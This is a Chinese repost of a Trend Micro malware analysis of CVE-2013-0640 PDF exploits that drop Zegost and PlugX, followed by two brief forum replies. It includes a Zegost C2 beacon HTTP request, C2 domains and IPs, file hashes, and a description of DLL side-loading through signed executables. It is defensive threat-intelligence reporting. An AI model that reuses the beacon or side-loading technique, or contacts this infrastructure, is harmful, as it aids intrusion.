隐藏在 PDF 中的 APT 攻击代码

Sammi888

作者：趋势科技

在 2012 年，我们看到了各式各样的 APT 攻击活动利用 Microsoft Word 的漏洞 – CVE-2012-0158。这是一种转变，之前最常被利用的 Word 漏洞是 CVE-2010-3333。虽然我们还是继续看到 CVE-2012-0158 被大量的使用，但我们也注意到恶名昭彰的 MiniDuke 攻击所制造的针对 Adobe Reader 漏洞 – CVE-2013-0640 的攻击程序代码使用量正在增加。这些恶意 PDF 文件所植入的恶意软件和 MiniDuke 并无关系，但却和正在进行中的 APT-高级持续性渗透攻击活动有关。



通过恶意 PDF 攻击程序代码进行的 APT 攻击正在大量增加

Zegost

趋势科技所发现的一组恶意 PDF 文件，包含上述漏洞攻击码的诱饵，使用了越南文，文件名也是相同的语言。



图一、诱饵文件样本

这些 PDF 文件内嵌与 MiniDuke 攻击活动类似的 JavaScript 程序代码。相似之处包括了类似的函数和变量名。



图二、类似的 JavaScript 程序代码

使用 Didier Steven 的 PDFiD 工具分析该 PDF 文件发现，这两个 PDF 文件非常相似。虽然并非完全相同，但两者之间的相似之处是难以否认的。有意思的地方是「/Javascript」、「/OpenAction」和「/Page」。这些地方分别代表有 JavaScript 出现，有某种自动行为出现和页码的具体信息。这三个项目可以帮我们确认 MiniDuke 和 Zegost 的相似之处。

植入的文件和数据也差不多。这两种攻击活动都植入了相同数量的文件，有着非常相似的文件名与类似的目的。即使注册表的修改部分也很类似。

不过这也是所有相似之处。这些 PDF 所植入的文件被称为 Zegost（或 HTTPTunnel），曾经在之前的攻击里发现过。和 MiniDuke 攻击所植入的恶意软件并无关联。Zegost 恶意软件有个鲜明的特征：

GET /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)

Host: dns.yimg.ca

Cache-Control: no-cache

命令和控制服务器 – dns.yimg.ca 所反查出的 IP – 223.26.55.122，一直被用在比较知名的命令和控制服务器上，例如 imm.conimes.com 和 iyy.conimes.com。用来注册该域名的电子邮件地址 – llssddzz@gmail.com，也曾被用来注册 scvhosts.com（另外一个已知的 C＆C 服务器器）和 updata-microsoft.com，应该也是有问题的域名。

PlugX

第二组恶意 PDF 文件间并不一定都直接有关联，虽然它们都会值入不同的 PlugX 变种。我们所分析的攻击似乎主要针对日本、韩国和印度的目标。

然而虽然这些攻击也利用了漏洞 – CVE-2013-0640，但是它们和上面所讨论的样本不同。比较文件时就可以看出差异，例如使用的 PDF 格式版本：
Zegost         MiniDuke         PlugX
PDF Header: %PDF-1.4          PDF Header: %PDF-1.4          PDF Header: %PDF-1.7
obj                    8          obj                    8          obj                   43
endobj                 8          endobj                 8          endobj                44
stream                 3          stream                 1          stream                10
endstream              3          endstream              2          endstream             11
xref                   1          xref                   1          xref                   4
trailer                1          trailer                1          trailer                4
startxref              1          startxref              1          startxref              4
/Page                  1          /Page                  1          /Page                  6
/Encrypt               0          /Encrypt               1          /Encrypt               0
/ObjStm                0          /ObjStm                0          /ObjStm                0
/JavaScript            1          /JavaScript            1          /JavaScript            1
/AA                    0          /AA                    0          /AA                    0
/OpenAction            1          /OpenAction            1          /OpenAction            1
/AcroForm              1          /AcroForm              1          /AcroForm              1
/JBIG2Decode           0          /JBIG2Decode           0          /JBIG2Decode           0
/RichMedia             0          /RichMedia             0          /RichMedia             0
/Launch                0          /Launch                0          /Launch                0
/EmbeddedFile          0          /EmbeddedFile          0          /EmbeddedFile          0
/XFA                   1          /XFA                   1          /XFA                   1
/Colors > 2^24         0          /Colors > 2^24         0          /Colors > 2^24         0

PlugＸ 也会植入文件和数据，但是却和 Zegost 或 MiniDuke 都不相同。文件数量不同，植入原因也不同。
Zegost         MiniDuke         PlugX
UserCache.bin         UserCache.bin         UserCache.bin
39f5d27d1a5e34ce9863406b799ef47a         39f5d27d1a5e34ce9863406b799ef47a         39f5d27d1a5e34ce9863406b799ef47a
ACECache10.lst         ACECache10.lst         ACECache10.lst
a1bb36552f1336466b4d728948393585         77402ee32c656d68eeb8a07e2a041dfb         77e16369d995628ff9df31c56129a2f2
A9RD50B.tmp (PDF)         A9RE077.tmp (PDF)         SharedDataEvents
dd28e2e06465464f0cb5eca4a9013421         85b890c0b10faa13014d4a22dae3fe3c         1a8d23271be2c45f31a537eaefbbf55d
A9RD50A.tmp (PDF)         A9RE078.tmp (PDF)         SharedDataEvents-journal
4f4ceedd8da84be88dbea7b49f1b82e5         e719894252665a7cbf8efc18babdd70e         4754e6d5ea3b6ca2357146a1e56c3c47
                SharedDataEvents-journal
                b16f24e72c42059cd44a9fb48ea8bf98
                A9RD53D.tmp (PDF)
                200569e47e6e5a3f629533423d4ba03b
                SharedDataEvents-journal
                b930ef3a77e6c4669312f582fc405f61
                SharedDataEvents-journal
                38149cfb66075a9009d460e86c138141
                SharedDataEvents-journal
                566ea4be505009d422d5fd6c395a33b9
                A9RD53C.tmp (PDF)
                ca79b7a45410dd1e995a4997dcc6d126

PlugX:HHX

PlugX 的第一组变种会利用 Microsoft HTML 辅助说明编译程序，就如同这篇文章所描述的一样。我们已经看到这变种被用在目标攻击活动中。在这个案例中，攻击者对目标发送了一封电子邮件，诱使他们打开恶意附件文件。

我们所分析的样本会将文件植入文件夹 hhx 中，并且利用正常的 Microsoft 文件 hhx.exe 载入 hha.dll，接着再载入 hha.dll.bak。我们分析文件所使用的命令和控制服务器是 14.102.252.142。

PlugX：PDH

我们所分析的第二组 PlugX 变种，会将文件植入到文件夹 PDH 中，并且利用已经签名过的 QQ 浏览器更新服务文件载入 PDH.dll，接着会载入 PDH.pak。



图三、签名过的文件

这些文件会利用 dnsport.chatnook.com、inter.so-webmail.com 和 223.25.242.45 做为命令和控制服务器。

结论

趋势科技的研究显示这些 APT 活动的攻击者开始利用 MiniDuke 攻击活动所制造的漏洞攻击码，并将其加入到自己的军火库中。与此同时，我们也发现似乎有其他 APT 攻击活动已经开发出自己的方式来利用相同的漏洞。攻击漏洞 – CVE-2013-0640 的恶意 PDF 数量增加，也代表了 APT 攻击者从使用恶意 Word 档案攻击相对老旧的漏洞 – CVE-2012-0158 开始转移阵地了。

＠原文出处：Malicious PDFs On The Rise





本文版权为趋势科技所有，对于非赢利网站或媒体转载请注明作者以及原文链接。谢谢合作！

爱趋势社区--下载/论坛/分享  http://www.iqushi.com

官方微博—拿礼品/分享最新IT资讯http://t.sina.com.cn/trendcloud

趋势科技CEO：陈怡桦EvaChen的微博http://weibo.com/evatrendmicro


       
               

sdupyb

沙发支持，学习路过。

ccsfuture

说了这么多我想知道趋势可以防御么？